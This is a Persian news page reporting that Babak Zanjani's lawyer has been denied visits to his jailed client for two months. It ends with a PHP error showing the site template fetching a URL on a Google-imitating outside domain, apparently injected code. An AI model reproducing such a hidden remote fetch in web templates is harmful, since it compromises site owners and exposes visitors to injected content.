Saturday 31 October 2020 / شنبه 10 آبان 1399

جستجو

P7a

AndishehTV

ATV Frequenter

Babak Zanjani in jail

رسول کوهپایه‌زاده، وکیل بابک زنجانی اعلام کرد که موکلش ممنوع‌الملاقات شده و دو ماه است که از او خبری ندارد.
به‌گزارش خبرگزاری مهر، رسول کوهپایه‌زاده چهارشنبه ۱۹ آبان گفت: «دو ماه است که اجازه دیدن موکلم را ندارم و ممنوع‌الملاقات شده است.»
او افزود بارها به دادستانی مراجعه کرده و علت ممنوع‌الملاقات شدن موکلش را جویا شده اما پاسخی نگرفته است.


بابک زنجانی، تاجر ایرانی، به اتهام پرداخت نکردن بدهی هشت هزار و ۶۰۰ میلیارد تومانی خود به وزارت نفت، دی‌ماه سال ۱۳۹۲ بازداشت شد. او در دوران تحریم‌های جهانی علیه ایران نفت ایران را در دیگر کشورها می‌فروخته است تا ایران بتواند تحریم‌ها را دور بزند. زنجانی پس از چندین جلسه دادگاه به همراه دو متهم دیگر این پرونده به اعدام محکوم شد اما حکم آن‌ها به اجرا در نیامد.
وکیل بابک زنجانی وضعیت جسمانی او بعد از عمل جراحی را خوب توصیف کرد اما گفت با گذشت سه سال از بازداشت موکلش او وضعیت روحی خوبی ندارد.
زنجانی در شهریورماه سال جاری به‌دلیل بیماری گوارشی در بیمارستان تحت عمل جراحی قرار گرفت و سپس به زندان بازگشت.
بابک زنجانی که خود را یک «بسیجی اقتصادی» می‌نامد، صاحب بیش از ۶۴ شرکت از جمله شرکت هولدینگ توسعه سورینت قشم، «اولین بانک سرمایه‌گذاری اسلامی» در مالزی، سهامدار شرکت هواپیمایی انور ترکیه، مؤسسه مالی اعتباری در امارات و بانک ارزش تاجیکستان بوده است


Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311